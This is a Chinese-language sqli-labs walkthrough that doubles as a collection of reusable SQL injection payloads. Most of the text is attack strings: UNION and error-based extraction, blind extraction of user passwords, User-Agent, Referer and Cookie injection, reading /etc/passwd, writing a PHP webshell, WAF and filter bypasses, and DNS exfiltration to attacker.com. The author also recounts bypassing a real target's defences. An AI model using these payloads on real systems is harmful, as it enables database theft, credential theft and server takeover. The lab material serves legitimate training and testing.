Sqli-labs靶场通关实战:从字符型注入到HTTP头部注入的完整指南(附Payload大全)
Sqli-labs靶场通关实战:从字符型注入到HTTP头部注入的完整指南(附Payload大全)
在网络安全领域,SQL注入始终是最常见且危害性极大的漏洞之一。Sqli-labs靶场作为专为SQL注入学习设计的实战环境,涵盖了从基础到高级的各种注入场景。本文将系统性地解析字符型、数字型、报错、盲注以及HTTP头部注入五大类技术,并提供可直接复用的Payload模板和调试技巧。
1. 注入类型分类与核心原理
SQL注入的本质是通过构造特殊输入,改变原始SQL查询的逻辑结构。根据应用场景和利用方式的不同,主要分为以下几种类型:
- 字符型注入:参数被单引号或双引号包裹
- 数字型注入:参数直接作为数字处理
- 报错注入:利用数据库错误信息泄露数据
- 盲注:包括布尔盲注和时间盲注
- HTTP头部注入:在HTTP头部字段中实施注入
1.1 字符型与数字型注入对比
| 特征 | 字符型注入 | 数字型注入 |
|---|---|---|
| 参数处理 | 被引号包裹('或") | 直接作为数字处理 |
| 闭合方式 | 需要闭合引号 | 无需闭合引号 |
| 典型Payload | 1' AND 1=1 -- | 1 AND 1=1 -- |
| 检测方法 | 观察引号导致的语法错误 | 观察逻辑表达式结果变化 |
字符型注入的关键在于正确闭合前端的引号,例如:
-- 原始查询 SELECT * FROM users WHERE id='$input' -- 注入Payload 1' UNION SELECT 1,2,database() --1.2 报错注入函数解析
报错注入利用数据库函数故意触发错误来泄露信息,常用函数包括:
updatexml():
AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)注意:updatexml第二个参数必须是合法XPath表达式,否则会报错并显示拼接内容
extractvalue():
AND extractvalue(1,concat(0x7e,(SELECT user()),0x7e))floor()+rand():
AND (SELECT 1 FROM (SELECT count(*),concat(database(),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
2. 盲注技术深度解析
当页面没有明显回显时,盲注成为获取数据的唯一手段。盲注分为布尔盲注和时间盲注两种形式。
2.1 布尔盲注实战技巧
布尔盲注通过观察页面返回的真假状态来推断数据,典型流程:
判断数据库长度:
AND (SELECT length(database()))=8 --逐字符猜解数据库名:
AND (SELECT ascii(substr(database(),1,1)))=115 --使用Burp Suite自动化:
- 配置Intruder攻击类型为"Cluster bomb"
- 设置两个Payload:
- Payload1:字符位置(1-长度)
- Payload2:ASCII值(32-126)
2.2 时间盲注高效方法
时间盲注通过引入延时判断条件真假,核心函数是if()+sleep():
-- 判断表名第一个字符 AND if(ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1),1,1))=117, sleep(3), 1) --优化技巧:
- 使用二分法缩小猜测范围
- 结合
benchmark()函数替代sleep()绕过过滤 - 多线程加速猜解过程
3. HTTP头部注入专项突破
HTTP头部注入是SQL注入的高级形式,主要出现在以下场景:
3.1 User-Agent注入(Less-18)
攻击步骤:
- 正常登录抓包
- 修改User-Agent字段:
User-Agent: ' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1), '1') -- - 从错误信息中提取数据
3.2 Referer注入(Less-19)
与User-Agent注入类似,但注入点在Referer头部:
Referer: ' AND (SELECT 1 FROM (SELECT count(*),concat(database(),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) --3.3 Cookie注入(Less-20)
利用Cookie字段实施注入:
- 登录后观察Cookie结构
- 修改Cookie值:
Cookie: uname=admin' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database() --
4. Payload大全与实战模板
4.1 通用探测Payload
-- 判断注入点 ' AND 1=1 -- ' AND 1=2 -- -- 判断列数 ORDER BY 4 -- -- 获取当前数据库 UNION SELECT 1,database(),3,4 -- -- 获取所有数据库 UNION SELECT 1,group_concat(schema_name),3 FROM information_schema.schemata --4.2 报错注入Payload集
-- MySQL AND updatexml(1,concat(0x7e,(SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()),0x7e),1) -- SQL Server AND 1=convert(int,(SELECT table_name FROM information_schema.tables)) -- Oracle AND 1=ctxsys.drithsx.sn(1,(SELECT user FROM dual))4.3 盲注高效Payload
-- 布尔盲注模板 AND (SELECT ascii(substr((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1),1,1)))=105 -- -- 时间盲注模板 AND if(ascii(substr((SELECT password FROM users LIMIT 0,1),1,1))>100, sleep(3), 1) --4.4 文件操作Payload
-- 读取文件 UNION SELECT 1,load_file('/etc/passwd'),3 -- -- 写入Webshell UNION SELECT 1,'<?php system($_GET[cmd]);?>',3 INTO OUTFILE '/var/www/html/shell.php' --5. 防御绕过与高级技巧
5.1 常见过滤绕过方法
关键字过滤:
SELSELECTECT -- 双写绕过 /*!SELECT*/ -- MySQL注释语法空格过滤:
/**/AND/**/1=1 -- %09AND%091=1 -- 使用Tab引号过滤:
AND username=0x61646d696e -- Hex编码
5.2 二次注入利用
当输入被转义但存储后再次使用时可能产生注入:
- 注册用户:
admin' -- - 修改密码时触发:
UPDATE users SET password='newpass' WHERE username='admin' -- '
5.3 DNS外带技术
当所有回显都被禁用时,利用DNS查询外带数据:
-- MySQL AND (SELECT load_file(concat('\\\\',(SELECT database()),'.attacker.com\\share\\'))) -- SQL Server ; DECLARE @data VARCHAR(1024); SET @data=(SELECT user); EXEC('master..xp_dirtree "\\'+@data+'.attacker.com\share"');在实际渗透测试中,我曾遇到一个案例:目标系统过滤了所有明显的SQL关键字,但通过使用/*!50000SELECT*/这种MySQL版本特异性语法成功绕过防御。另一个有趣的发现是,某些WAF对HTTP头部注入的检测较弱,在User-Agent字段中使用注释符/**/可以轻松绕过检测。